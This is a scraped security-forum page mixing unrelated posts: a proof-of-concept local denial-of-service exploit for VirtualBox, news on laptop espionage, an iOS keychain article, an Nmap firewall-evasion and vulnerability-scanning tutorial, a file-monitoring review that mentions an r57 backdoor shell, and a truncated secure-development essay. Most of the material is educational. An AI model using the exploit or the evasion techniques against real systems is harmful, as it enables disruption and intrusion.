DarkyAngel

Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability Source: http://www.securityfocus.com/bid/55471/info Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. /** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall the copyright owner be * liable for any direct, indirect, incidential, special, exemplary or * consequential damages, including, but not limited to, procurement * of substitute goods or services, loss of use, data or profits or * business interruption, however caused and on any theory of liability, * whether in contract, strict liability, or tort, including negligence * or otherwise, arising in any way out of the use of this software, * even if advised of the possibility of such damage. * * Copyright (c) 2012 halfdog <me halfdog.net> * * Compile: gcc -o RtcInt RtcInt.c * Usage: ./RtcInt */ int main(int argc, char **argv) { asm ( "int $0x8;" : // output: none : // input: none :"%eax", "%ebx", "%ecx", "%edx" // clobbered register ); return(0); } Sursa

a?a e, dar s? ai grij? mare s? nu te prind?!

iOS 6, camera iSight pe modul panorama, f?r? google maps, un sistem integrat in iOS 6 "ghidat" mai mult de catre Siri, Siri mai "evoluata" oricum, nu sunt asa multe chestii noi..

nu ?i se pare c?-?i permi?i cam multe?

http://i.imgur.com/aPPfv.png în caz c? vre?i cu sigla rst, e m?rit? cu "calitate" la dimensiunea necesar? de acolo

Whether they're jamming crushed Altoids mints into screw holes or prepping themselves to swallow Micro SD cards, some travelers are now going to extreme lengths to defend against foreign snoops. H.D. Moore wasn't taking chances. During the spring of 2009, the information specialist traveled to Shanghai on a work trip. For a computer, though, he carried only a stripped down Netbook that he modified using a trick even James Bond would have admired. He sawed off the end of one of the laptop case screws and mashed a small bit of a crushed Altoids mint into the hole before putting the screw back in. After leaving it in his hotel room for a few hours, he came back to find that the powder had disappeared. Something had caused the battery to fail, and one of the three passwords protecting his machine had been wiped. "More than likely it was tampered with," Moore, chief security officer at security firm Rapid7, said. While he concedes a "slim chance" that the battery just happened to die when he left the room, he notes that it's odd for dead batteries to start working again upon reboot, as his did. Not to mention the fact that the powder in the screwhole would have had to displace itself at the same time. Welcome to the world of international corporate espionage, where USB sticks are a favored tools for spies and bribable hotel workers are a dime a dozen. The problem is rampant, particularly in China, where the secrets in laptops of U.S. officials and businessmen can reshape an industry or change the course of a war. "Foreign Spies Stealing U.S. Economic Secrets in Cyberspace," a report issued last October by the U.S. Office of the National Counterintelligence Executive, warns of the dangers. "Whether traveling for business or personal reasons, U.S. travelers overseas -- businesspeople, U.S. government employees, and contractors -- are routinely targeted by foreign collectors, especially if they are assessed as having access to some sensitive information. Some U.S. allies engage in this practice, as do less friendly powers such as Russia and China. Targeting takes many forms: exploitation of electronic media and devices, surreptitious entry into hotel rooms, aggressive surveillance, and attempts to set up sexual or romantic entanglements." Similarly, the report "China 2012 Crime and Safety Report: Beijing" warns: "All hotel rooms and offices are considered to be subject to onsite or remote technical monitoring at all times. Hotel rooms, residences, and offices may be accessed at any time without the occupants' consent or knowledge... All means of communication -- telephones, mobile phones, faxes, e-mails, text messages, etc. -- are likely monitored." Sources within the U.S. government claim that during Commerce Secretary Carlos M. Gutierrez' trip to Beijing in December 2007, an unattended laptop was snagged and relieved of data that was then used to try to hack into government computers in the U.S. For Moore, the concern was that spies would get access to his corporate e-mail or pull schematics off his laptop related to the high-end network testing gear made by BreakingPoint Systems, where he worked at the time as security research director. He was in China specifically to show the equipment to government officials. "I took a temporary laptop out for the trip," he said. "I wanted to make sure I had something I could destroy and set fire to later if I had to." This is the underside of the laptop HD Moore used to set his spy trap on his trip to China. The trick screw hole is seen in the top left corner. (Credit: HD Moore) Specifically, Moore was worried that someone would copy his data to an external drive or install a program that could be used to remotely spy on the computer. To keep snoops out, he set up a password on the BIOS (Basic Input/Output System), as well as for the hard drive and used a TrueCrypt boot password too. "Even with that level of paranoia, I had to step out of the hotel in Shanghai (French Quarter business hotel, not Western style), left my Netbook in the room, and two hours later when I returned the BIOS password had been wiped and the powder was gone from the screw hole," he wrote in an e-mail. "I didn't turn it on again until I landed in South Korea and had some time to inspect the motherboard. As far as I can tell, the BIOS was reset through the CMOS (Complementary metal-oxide-semiconductor) jumper/battery short, but no other changes were made." Kevin Mitnick, who spent five years in prison on computer hacking charges, believes his background made him a target for surveillance during a trip to Colombia in 2008. (He was also detained at the border coming back to the U.S. after that trip, but believes the spying incident is totally unrelated. Weird things just kind of happen to Mitnick.) The 'aha' moment Mitnick was in Bogota to give a speech to the newspaper El Tiempo and to visit his then-girlfriend. One night he had left his laptop in the room when he went out to dinner. When he came back his hotel room key wouldn't work. A yellow light appeared when he tried to open the door, which would indicate that it was locked from the inside. He didn't think too much about it, until this happened twice more following visits back down to the front desk to get new keys. The fourth key unlocked the door, finally. But nothing seemed to be amiss with his computer, so Mitnick wasn't initially worried. Later, the laptop got dented on the flight back to the U.S. so he took it to an Apple store after he got home to get the chassis replaced. There he found that the screws were very loose and one was missing. He knew the screws had been tight because he'd installed a blank drive right before the trip as a security measure. "That was the 'aha' moment," Mitnick said, referring to when he saw the loose screws and flashed back to the mystery hotel key failures. "I always suspected somebody cloned my hard drive... I highly suspect it happened but I have no proof. After that I was in paranoid mode." Now he never leaves equipment in his room unattended. "I carry it with me wherever I go," said Mitnick, who is an author and security consultant. "I just put it in a book bag." For people who absolutely can't take their computer with them for some reason, Mitnick suggests they put it in a "soft-cloth," untearable FedEx envelope, seal it, mark the closure with pen and put it in the hotel safe so if it is opened it will be noticeable. Spies can still get to it, but they'll find it difficult to tamper with it undetected, he said. In one of the craziest tricks "spy hunter" James Atkinson has ever seen in his many years in the business, an executive took a micro SD card that contained sensitive data, wrapped it in plastic, and carried it inside his mouth between the gum and cheek. "That's pretty extreme," said Atkinson, who is president of Granite Island Group and has taught counterintelligence to more three-letter U.S. government agencies than I care to name. "If they are in China and someone tries to take them into custody, they will swallow it and hope the government releases them before they have to go to the bathroom." Spy versus spy A common ploy to throw spies off is to store unimportant "decoy" encrypted data on a system, like song files or video, mixed in with some more interesting but still not sensitive files. The spies won't immediately know how important the files are until after they've wasted time and energy decrypting it. "Feed them garbage," Atkinson said. There's also the old video recorder-in-the-clock technique. "That wind-up clock you had on your dresser (facing your laptop), every time it sensed movement it recorded it," he said. "Or the power supply for your laptop had a recording system built into it and you set it on your desk and it videotaped everybody who touches your computer." The video recorder can be deactivated when the user lays a gold ring with a special triggering magnet on the power supply. When the user puts the ring on his finger the video recorder starts recording again. "I've known people who have taken laptops outside the country, who set them up in their hotel room with a hidden video recorder in the room and put the computer out strictly as bait," and left the hotel room, Atkinson said. When they came back and checked the video they saw "two people coming in with a briefcase, plugging in (a data stealing device) and copying everything on the computer," he said. "That was in Europe." Atkinson recommends that before and after people travel, they should weigh their computer without the battery, weigh the battery by itself, and weigh the power supply separately too. This way you can find out if someone managed to put a bug in any of the equipment. "They may bug the power supply of a computer, bug a computer, suck everything off a computer, or just take the battery out, remove some cells from the battery and put a listening device in it," he said. "A good bug weighs no more than a fourth of a sugar cube, or a few paper clips." He also suggests taking multiple power cords and batteries to confound eavesdroppers. "They put bugs in power cords, record the room audio, digitize it and slowly transmit it through the power lines, sneaking through (government) filters of classified areas," Atkinson said. It's not only government officials and corporate executives who are at risk. Students from prestigious universities studying aeronautics, science, and other areas that may land them future government jobs are targets for blackmail by foreigners eager to recruit spies. "As soon as you go through the airport and you have to show your passport to leave the United States, at that point in time you can trust nothing until you get back home," he said. This is the screen that was displayed when Moore rebooted the laptop after he had left unattended in his hotel room. (Credit: HD Moore) Original Article

a?a e, e "Ponta"-neala peste 50%, cel pu?in prima parte e copiat? mot-a-mot , doar tradus?, pentru joc a creeat el mai multe func?ii, ?i partea în care zice c? e "AI" ar fi f?cut? tot de el, în rest e luat de acolo ?i tradus..

In the first part of this article, we have discussed the iPhone application traffic analysis. In the second part, we covered the privacy issues and property list data storage. In this part, we will take a look at in-depth analysis of the keychain data storage. Apple has designed the keychain with many security measures in place to protect the user’s data, however it is broken at every level. So complete understanding of the keychain and its security & weaknesses will help penetration testers to provide proper remediation suggestions during iOS application security assessments. Local Data Storage Keychain Storage: Keychain is an encrypted container (128 bit AES algorithm) and a centralized SQLite database that holds identities & passwords for multiple applications and network services, with restricted access rights. On the iPhone, keychain SQLite database is used to store the small amounts of sensitive data like usernames, passwords, encryption keys, certificates and private keys. In general, iOS applications store the user’s credentials in the keychain to provide transparent authentication and to not prompt the user every time for login. iOS applications use the keychain service library/API (secItemAdd, secItemDelete, secItemCopyMatching & secItemUpdate methods) to read and write data to and from the keychain. Developers leverage the keychain services API to dictate the operating system to store sensitive data securely on their behalf, instead of storing them in a property list file or a plaintext configuration file. On the iPhone, keychain SQLite database file is located at – /private/var/Keychains/keychain-2.db. Keychain contains a number of keychain items and each keychain item will have encrypted data and a set of unencrypted attributes that describes it. Attributes associated with a keychain item depend on the keychain item class (kSecClass). In iOS, keychain items are classified into 5 classes – generic passwords (kSecClassGenericPassword), Internet passwords (kSecClassInternetPassword), certificates (kSecClassCertificate), keys (kSecClassKey) and digital identities (kSecClassIdentity, identity=certificate + key). In iOS keychain, all the keychain items are stored in 4 tables – genp, inet, cert and keys (shown in Figure 1). Genp table contains generic password keychain items, inet table contains Internet password keychain items, and cert & keys tables contain certificates, keys and digital identity keychain items. (Figure 1) Columns in the keychain tables are mapped to the corresponding keychain item class attributes. Example: genp table columns shown in Figure 2 are mapped to generic password keychain item class attributes as shown in Table 1. (Figure 2) [table=width: 500, class: grid] [tr] [td]column[/td] [td]Attribute[/td] [td]description[/td] [/tr] [tr] [td]cdat[/td] [td]kSecAttrCreationDate[/td] [td]Item creation date in Unix epoch time format[/td] [/tr] [tr] [td]mdat[/td] [td]kSecAttrModificationDate[/td] [td]Item modification date in Unix epoch time format[/td] [/tr] [tr] [td]desc[/td] [td]kSecAttrDescription[/td] [td]User visible string that describes the item[/td] [/tr] [tr] [td]icmt [/td] [td]kSecAttrComment [/td] [td]User editable comment for the item[/td] [/tr] [tr] [td]crtr[/td] [td]kSecAttrCreator/td] [td]Application created (4 char) code[/td] [/tr] [tr] [td]type[/td] [td]kSecAttrType[/td] [td]Item type[/td] [/tr] [tr] [td]scrp[/td] [td]kSecAttrScriptCode[/td] [td]String script code (such as encoding type)[/td] [/tr] [tr] [td]labl[/td] [td]kSecAttrLabel[/td] [td]Label to be displayed to the user (print name)[/td] [/tr] [tr] [td]alis[/td] [td]kSecAttrAlias[/td] [td]Item alias[/td] [/tr] [tr] [td]invi[/td] [td]kSecAttrIsInvisible[/td] [td]Invisible[/td] [/tr] [tr] [td]nega[/td] [td]kSecAttrIsNegative[/td] [td]Invalid item[/td] [/tr] [tr] [td]cusi[/td] [td]kSecAttrHasCustomIcon[/td] [td]Existence of application specific icon (Boolean)[/td] [/tr] [tr] [td]prot[/td] [td]kSecProtectedDataItemAttr ? [/td] [td]Item’s data is protected (Boolean)[/td] [/tr] [tr] [td]acct[/td] [td]kSecAttrAccount[/td] [td]Account key (such as user id)[/td] [/tr] [tr] [td]svce[/td] [td]kSecAttrService[/td] [td]Service name (such as Application identifier)[/td] [/tr] [tr] [td]gena[/td] [td]kSecAttrGeneric[/td] [td]User defined attribute[/td] [/tr] [tr] [td]data[/td] [td]kSecValueData [/td] [td]Actual data (such as password, crypto key…)[/td] [/tr] [tr] [td]agrp[/td] [td]kSecAttrAccessGroup[/td] [td]Keychain access group[/td] [/tr] [tr] [td]pdmn[/td] [td]kSecAttrAccessible[/td] [td]Access restrictions (Data protection classes)[/td] [/tr] [/table] Attributes for all the keychain item classes are documented in the -Keychain Item Original Article

Nmap is the most powerful scanner that is used to perform so many functions including port scanning, service detection, and even vulnerability detection. Nmap from beginner to advanced has covered many basic concepts and commands, and in this second part of this series of articles I will discuss some advanced techniques of Nmap. How to Evade a Firewall/IDS Firewalls and IDS (intrusion detection systems) normally play an important role to defend the remote target very well from a security point of view because these hardwares and softwares are capable of blocking the intrusion, but in the case of penetration testing you need to bypass these tools to get the right result otherwise you will be misled. Nmap can scan the firewall and other intrusion detection systems on the remote target computer, as it uses different types of techniques to fight against these softwares and the techniques are dependent on the remote software. There are two types of firewall that might be installed on the target computer: Host based firewall (A firewall is running on a single target computer, for example you are running a firewall on your computer) Network based firewall (A firewall has been installed and is running to protect the entire network and has been deployed at the node of the network, it might be LAN) There are two types of IDS/IPS also available that might be installed on the target machine, this is the situation that a penetration tester needs to tackle. There are so many different type of Nmap techniques that can be used in this situation, for example: TCP ACK Scan (-sA) It is always good to send the ACK packets rather than the SYN packets because if there is any active firewall working on the remote computer then because of the ACK packets the firewall cannot create the log, since firewalls treat ACK packet as the response of the SYN packet. The TCP ACK scan requires the root privileges at the attacker side and it performs very well for the stateless firewall and IDS. As a penetration tester you need to check the response of a firewall; there might be four types of responses: Open port (few ports in the case of the firewall) Closed port (most ports are closed because of the firewall) Filtered (Nmap is not sure whether the port is open or not) Unfiltered (Nmap can access the port but is still confused about the open status of the port) So these are some important responses that you might get during a penetration testing. ACK scan is slightly different from the other types of scanning techniques because it has not been designed to discover the open ports, but it has an ability to determine the filtered and unfiltered responses. Let’s compare the two results of an ACK scan. [table=width: 500] [tr] [td]Firewall Enabled[/td] [td]Firewall Disabled[/td] [/tr] [tr] [td]# nmap -sA 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 13:30 PKT Nmap scan report for 192.168.1.9 Host is up (0.00077s latency). All 1000 scanned ports on 192.168.1.9 are filtered[/td] [td]# nmap -sA 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 13:31 PKT Nmap scan report for 192.168.1.9 Host is up (0.00020s latency). All 1000 scanned ports on 192.168.1.9 are unfiltered[/td] [/tr] [/table] So now it is very easy to find out whether the target computer has a firewall enabled or not, since a simple ACK scan means there is a lower chance of detection at the victim side but a high chance for the attacker to discover the firewall. The result of a SYN scan for both the situations are as follows: Note: The victim is the Windows computer for all the cases with the three situations. Firewall enabled Firewall enabled + all ports are closed Firewall disabled TCP Window Scan (-sW) : Very similar to the ACK scan with a little difference, the TCP window scan has been designed to differentiate between open and closed ports instead of showing unfiltered. It also requires the root privilege to execute. Let’s examine the different responses of a TCP window scan. [table=width: 500] [tr] [td]Firewall Enabled[/td] [td]Firewall Disabled[/td] [/tr] [tr] [td]# nmap -sW 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 13:50 PKT Nmap scan report for 192.168.1.9 Host is up (0.00051s latency). All 1000 scanned ports on 192.168.1.9 are filtered[/td] [td]# nmap -sW 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 13:51 PKT Nmap scan report for 192.168.1.9 Host is up (0.00071s latency). All 1000 scanned ports on 192.168.1.9 are closed[/td] [/tr] [/table] This type of scan does not open any active session with the target computer, so there is no chance that the victim’s computer can create a log of the activities. It works on the simple phenomena to send ACK packets and receive a single RST packet in response. Fragment Packets (-f) It is a very general concept and can be used in so many different situations, for example: if the target machine does not have the capabilities to handle larger packets then the fragmentation technique is useful to evade the firewall. The parameter of this technique is -f, it just split the request into small segments of IP packets called the fragmented IP packets. You can use -f twice -ff if you want to further break the IP headers. [table=width: 500] [tr] [td]Firewall Enabled[/td] [td]Firewall enabled + all ports are closed[/td] [td]Firewall Disabled[/td] [/tr] [tr] [td]# nmap -f 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 14:21 PKT Nmap scan report for 192.168.1.9 Host is up (0.00056s latency). Not shown: 998 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)[/td] [td]# nmap -ff 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 14:24 PKT Nmap scan report for 192.168.1.9 Host is up (0.00083s latency). All 1000 scanned ports on 192.168.1.9 are filtered MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)[/td] [td]# nmap -f 192.168.1.9 Starting Nmap 5.51 ( Nmap - Free Security Scanner For Network Exploration & Security Audits. ) at 2012-07-28 14:20 PKT Nmap scan report for 192.168.1.9 Host is up (0.00057s latency). Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems)[/td] [/tr] [/table] Spoof MAC Address This one is the simpler techniques,you can spoof your MAC (attacker MAC) address., MAC address spoofing creates a very difficult situation for the victim to identify the computer who originated the incoming request. Nmap can select a completely random MAC address for each and every scan based on the vendor name, the other option is to manually specify the MAC address (by doing this an attacker can spoof the address of a computer on the same network). Nmap has the database called nmap-mac-prefixes and whenever the vendor name is given it looks on the database to find the suitable MAC address. # nmap –spoof-mac Cisco 192.168.1.3 Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 17:18 PKT Spoofing MAC address 00:00:0C:6D:3F:26 (Cisco Systems) Nmap scan report for 192.168.1.3 Host is up (0.00036s latency). Not shown: 996 filtered ports PORT STATE SERVICE 23/tcp closed telnet 80/tcp closed http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:66:13:9B (Cadmus Computer Systems) Nmap Timing Option Timing option is a very important and an interesting feature of a Nmap, since sometimes you need to make a delay between every request. There are so many reasons for this but the most important reason is stress on the network; sometimes the victim’s computer and even a network cannot handle a big request. As a penetration tester you need to make sure that your scanning should not be treated as a Denial of Service attack (DoS), so the timely response and request are very important aspects in scanning. Nmap has so many features and parameters that can be very helpful to scan a target in a timely manner, the fragmentation technique (-f) as discussed is also a useful technique to split your request into multiple segments. The other important parameters are discussed below: Delay (–scan_delay) This is the best parameter that can be used to control the delay between each and every request Since you can control the time between each probe you need to be make sure to use the timing in integer form and do not forget to mention the unit of time: ms (millisecond) e.g. 5ms s (second) e.g. 5s m (minute) e.g. 5m h (hour) e.g. 5h Let’s consider an example: [table=width: 500] [tr] [td]Simple Scan[/td] [td]Delay Scan[/td] [/tr] [tr] [td]# nmap localhost . . . Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds[/td] [td]# nmap –scan_delay 5ms localhost . . . Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds[/td] [/tr] [/table] Host Timeout Option (–host-timeout) Sometimes a host takes too much time to respond and if you are scanning an entire network then it is very difficult to wait for a single host. There might be so many reasons behind a slow response, for example the network connectivity and the firewall, so if you don’t want to waste your time then you can set a time limit. Nmap Scripting Nmap scripting is one the best features that Nmap has. Nmap scripts are very useful for the penetration tester because they can save so much time and effort. The Nmap scripting engine has more than 400 scripts at the time of this writing, and you can create your own script and everyone can create a script and submit it to the script engine to help the community of penetration tester. Nmap scripts can perform so many different functions from vulnerability scanning to exploitation and from malware detection to brute forcing. In this section I will discuss some of the best Nmap scripts and their usage: smb-check-vulns This is one of the important scripts that can scan to check the vulnerabilities: MS08-067 Windows vulnerability that can be exploited Conficker malware on the target machine Denial of service vulnerability of Windows 2000 MS06-025 Windows vulnerability MS07-029 Windows vulnerability Now it is very easy to find the above vulnerabilities on the target machine, and you can easily exploit it via Metasploit. Http-enum If you want to enumerate on the web server to find the directories of the website then this is the best Nmap script for this purpose. The http-enum script is also used to discover the open ports and to list softwares with their version of each port. root@bt:~# nmap -sV –script=http-enum 127.0.0.1 Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-28 18:47 PKT Nmap scan report for localhost (127.0.0.1) Host is up (0.000036s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.14 ((Ubuntu)) | http-enum: | /login.php: Possible admin folder | /login/: Login page | /login.php: Login page | /logs/: Logs samba-vuln-cve-2012-1182 The script to perform the desired scanning against the target machine to find the Samba heap overflow vulnerability CVE-2012-1182. nmap –script=samba-vuln-cve-2012-1182 -p 139 target nmap –script=samba-vuln-cve-2012-1182 -p 139 192.168.1.3 smtp-strangeport So many organizations are running their SMTP server on the non standard port for security reasons. Smtp-strangeport is the script to find out whether the SMTP is running on the standard port or not. nmap -sV –script=smtp-strangeport target http-php-version As the name suggests, this script has been created to get the PHP version from the web server. The software version is very important for a penetration tester to find the respective vulnerability, so this script is very helpful for web application penetration testing. nmap -sV –script=http-php-version target The Nmap scripting engine contains so many scripts that you can even find several scripts for a specific softwareor platform. For example: if you want to do penetration testing on a website which is based on WordPress then you can use Nmap scripts for this purpose. http-wordpress-plugins http-wordpress-enum http-wordpress-brute dns-blacklist This is the best script in my view to find the blacklisted IP addresses. All you need to do is just provide an IP, then the script checks it for the DNS anti-spam and proxy blacklist. # nmap -sn 67.213.218.72 –script dns-blacklist Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-28 23:54 PKT Nmap scan report for 67.213.218.72 Host is up (0.24s latency). Host script results: | dns-blacklist: | PROXY | dnsbl.tornevall.org – PROXY | IP marked as “abusive host” | Proxy is working |_ Proxy has been scanned Conclusion This article is an effort to cover the most important aspects of Nmap from beginning to advanced so that everyone can learn even without previous knowledge. This is not the end because Nmap has a lot of features, you can do many things by using Nmap. I recommend you to practice with it every day because practice makes a man perfect. Sursa

A few weeks ago, I happened to read an article from pir8geek.com (a blog about Linux goodies and tips) about a new tool which is very useful to system administrators and users for monitoring their files, folders, configurations, backups, scripts and directories in Windows, Linux, FreeBSD, Mac OS, and Solaris. This new tool or application is called Log4Trail and it is a lightweight file monitoring tool which can also be considered a simple or basic intrusion detection system (IDS) that is coded from scratch in Java by impeldown of The ProjectX Blog. Log4Trail has a user-friendly graphical user interface (GUI) which is helpful for newbies, junior system administrators and users who want to monitor their files and directories easier in order to check if there are files that are being modified by someone who could possibly be a malicious user, a cracker or maybe your pesky little brother or sister who wants to play a prank on you. Once you open the application, it will prompt a pop up balloon or message from the system tray which will notify the current user who is logged into the system. And just like any intrusion detection systems out there, it records information about the files that have been changed and then notifies the security and system administrators of the important observed events with the use of the balloon pop up message and through email if the mailer configuration setup is configured. To record the observed events, the application uses the SQLite database to store information of the system files. Yes you read me right, it produces reports like a boss! Getting Started with Log4Trail File Monitoring Log4Trail is a free software application that can be downloaded here. The file format is a tarball file, so to extract the contents of that file and move to its directory, type these commands in your terminal: tar -zxvf Log4Trail.tar.gz cd Log4Trail To run the application, issue this one-line command in your terminal: java -jar Log4Trail.jar The application has a setup or extra feature that sends you an email about the file changes [from checksum] and [to new checksum] using the SHA1 file checking algorithm and in order to activate this feature, click Options and then click on Enable Mailer. The next thing you should do is configure the mailer configuration and the mailer account with the corresponding recipients(TO,CC,BCC) to your choice. This can be used if you are away from your computer or server because you will be notified through email about the files or directories that were changed. So be sure you bring your laptop or your handy dandy smart phone with you always in order to be updated. Now set the path of the directory or the file that you want to be monitored by clicking on the File Manager which can be found under the File menu button of the main form, or you can access it through its shortcut key which is Ctrl + Shift + A. Click the New button, then navigate through the file or directory that you want to manage and monitor. Take for example this scenario: a system administrator wants to monitor or check if there will be new users that will be added to his Linux server so he can just set Log4Trail’s File Manager configuration to /etc/passwd. This can be helpful in order to detect malicious users who are currently adding users in the system if your system has been compromised. In my case, I decided to set and configure it to /var/www because I have a LAMP (Linux, Apache, Perl, Perl / Python /PHP) server running locally in my school which is intended for penetration testing purposes, program testing and for hunting malicious users. After adding up a directory to be monitored or checked by the application, a dialog or prompt box should appear which should look like the image below. Take note that the dialog or prompt box (image above) appears only if it is a directory because you will be given choices for the directory recursion type so just click on Yes to continue with the setup and then another prompt up box should appear which says “Please select recursion type”. If you want to recursively add file contents in a subdirectory just choose “Force recursion in subdirectories,” and if you want to add only file contents then choose “Only recurse contents”. In this writeup, I chose the option “Only recurse contents”. If you have chosen a file that you want to be monitored solely then it should automatically be added so no need to worry regarding that setup. Now, if you have other files or directories that you want to be added, just click on the New button again and follow the process. After setting up the File Manager, just restart the application so that the changes will take effect. After the application is done restarting, it should start monitoring the files in your server. You should be good to go then. Now here is what I did in order to check if Log4Trail File Monitoring is really that effective and can be used as a simple intrusion detection system (but not as an intrusion prevention system): I planted a backdoor shell in my Linux box which has a local LAMP server running, then I moved to another computer in my network and accessed its internal IP (Internet Protocol) address by using the common r57 PHP backdoor shell. Then I edited the file bot.txt which is under the /var/www directory, and here is a screenshot I took which shows what just appeared on the computer system tray where Log4Trail is obviously running and monitoring /var/www. It says “/var/www/bot.txt has been changed” and that Log4Trail has detected that I edited the bot.txt with some text. And because I was able to enable the mailer and setup the mailer configuration then I should receive an email about the changes in my files. Here is a screenshot of the email I just got. And then you should be able to see the record of what file has just been modified or edited in the main application. It also shows if the email was sent to the system administrator or the user. Thus the details include: identifier, time stamp, station, file, from CS, to CS, and mailed. So if an intruder is able to change the index of your website, the system tray alerts you. The image below gives another scenario. Additional Information and Tips Log4Trail is also built and compatible for Windows. Thus, it can be used to monitor the users or the employees in your company that are using the computers in your network so that you will be aware as to what they are doing even if you are not connected to a remote desktop connection. It can also be used to observe the behavior of a malware that has modification functions, although reverse engineering is still the best strategy to test and review the malware, at least you have some ideas about the malware’s targets. In Windows, monitoring your C:\Windows folder and its subdirectories is also a good strategy because it contains important system files. If you are maintaining Microsoft Windows Servers like Windows Server 2003, Windows Server 2008, Windows HPC Server 2008, Windows Server 2008 R2 and Windows Server 2012, it is wise to monitor the files that are being shared, your file backups, and your configuration files. Log4Trail can also be minimized on the system tray when you click the X button from the main form and it will still continue monitoring your files and your directories. To show the main form again, just click the monitor-like icon on your system tray. Log4Trail’s scanning option or monitoring speed can be changed to High, Normal (Default Mode), Low, or Paused, and it has a Stop/Start functionality for the interactive mode of the application. When the application starts, it launches the auto scan mode or monitors if there are data retrieved from the File Manager, so as long as you have already configured your File Manager setup, you don’t need to configure the setup for scanning the files or directories and repeat the process. Well that’s all guys, I leave the rest to you. References: Log4Trail File Monitoring | #! Pir8Geek InfoSec Resources – Using Log4Trail

In the February 2012 edition of Computer, a sidebar to an article on “Web Application Vulnerabilities” asks the question: “Why don’t developers use secure coding practices?” [1] The sidebar provides the typical cliches that programmers feel constrained by security practices and suggests that additional education will correct the situation. Another magical solution addressing security concerns is to introduce a secure development process. However, going from improved security education or a new secure development process requires a plan to connect the current development processes to one that is more secure, as the cartoon suggests. Instead of looking for a single solution, another approach is to identify the threat agents, threats, vulnerabilities, and exposures. After identifying these, the next step is to establish a cost-effective security policy that will provide safeguards. Many view programmers as the primary threat agent in a development environment, however Microsoft reports that more than 50% of the security defects reported were introduced in the design of a component [2]. Microsoft’s finding suggests that both designers and programmers are threat agents. According to Microsoft’s data, designers and programmers introduce vulnerabilities into an application; it is therefore appropriate to identify all of the software development roles (analysts, designers, programmers, testers) as potential threat agents. Viewing software developers as threat agents should not imply that the individuals filling these roles are careless or criminal, but they have the greatest opportunity to introduce source code compromising the confidentiality, integrity, or availability of a computer system. Software developers can expose assets accidentally by introducing a defect. Defects have many causes, such as oversight or lack of experience with a programming language, and are a normal part of the development process. Quality Assurance (QA) practices, such as inspections and unit testing, focus on eliminating defects from the delivered software. Developers can also expose assets intentionally by introducing malicious functionality [3]. Malicious functionality can take the form of a variety of attacks, such as worms, Trojans, salami fraud, and other types of attacks [4]. A salami fraud is an attack in which the perpetrators take a small amount of an asset at a time, such as the “collect the round-off” scam [5]. An individual interested in introducing illicit functionality will exploit any available vulnerability. Identifying all of the potential exposures and creating safeguards provides a significant challenge to the security analysts,but by analyzing the development process, it is possible to identify a number of cost-effective safeguards. Addressing these exposures, many researchers recommend enhancing an organization’s QA program. One frequent recommendation is to expand their inspection practice by introducing a checklist for the various exposures provided by the programming languages used by developers [2]. Items added to a security inspection checklist typically include functions such as Basic’s Peek() and Poke() functions, C’s string copy functions, exception handling routines, and programs executing at a privileged level [2]. Functions like Peek() and Poke() make it easier for a programmer to access memory outside of the program, but a character array or table without bounds checking produces similar results. A limitation of the language-specific inspection checklist is that each language used to develop the application must have a checklist for the language. For some web applications, this could require three or more inspection checklists, and this may not provide safeguards for all of the vulnerabilities. Static analyzers, such as the SEMATE research, being sponsored by the National Institute of Standards and Technology (NIST), is an approach automating some of the objectives associated with an inspection checklist, but static analyzers have a reputation for flagging source statements that are not actually problems [6]. Using a rigorous inspection process as a safeguard will identify many defects, but it will not adequately protect from exposures due to malicious functionality. An inspection occurring before the source code is placed under configuration control provides substantial exposure. In this situation, the developer simply adds the malicious functionality after the source code passes inspection or provides the inspection team a listing not containing the malicious functionality. Figure 1 illustrates a traditional unit-level development process containing this vulnerability. As illustrated in Figure 1, a developer receives a changer authorization to begin in the modification or implementation of a software unit. Generally, the “authorization” is verbal, and the only record of the authorization appears on a developer’s progress report or the supervisor’s project plan. To assure that another developer does not update the same source component, the developer “reserves” the necessary source modules. Next, the developer modifies the source code to have the necessary features. When all of the changes are complete, the developer informs the supervisor who assembles a review panel consisting of 3 to 5 senior developers and/or designers. The panel examines the source code to evaluate the logic and documentation in the source code. A review committee can recommend that the developer make major changes to the source code that will require another review, minor changes that do not require a full review, or no changes and no further review. It is at this point in the development process where the source code is the most vulnerable to the introduction of malicious functionality, because there are no reviews or checks before the software is “checked-in”. Another limitation of inspections is that the emerging Agile methodologies recommend formal inspections. Development methodologies, such as eXtreme programming, utilizes pair-programming and Test Before Design concepts in lieu of inspections, and Scrum focuses on unit testing for defect identification [7, 8]. Using inspections as the primary safeguard from development exposures limits the cost savings promised by these new development methodologies and does not provide complete protection from a developer wishing to introduce malicious software. Programming languages and the development process offer a number of opportunities to expose assets, but many of the tools, such as debuggers and integrated development environments, can expose an asset to unauthorized access. Many development tools operate at the same protection level as the operating system kernel and function quite nicely as a worm to deposit a root kit or other malicious software. Another potential exposure, not related to programming languages, is “production” data for 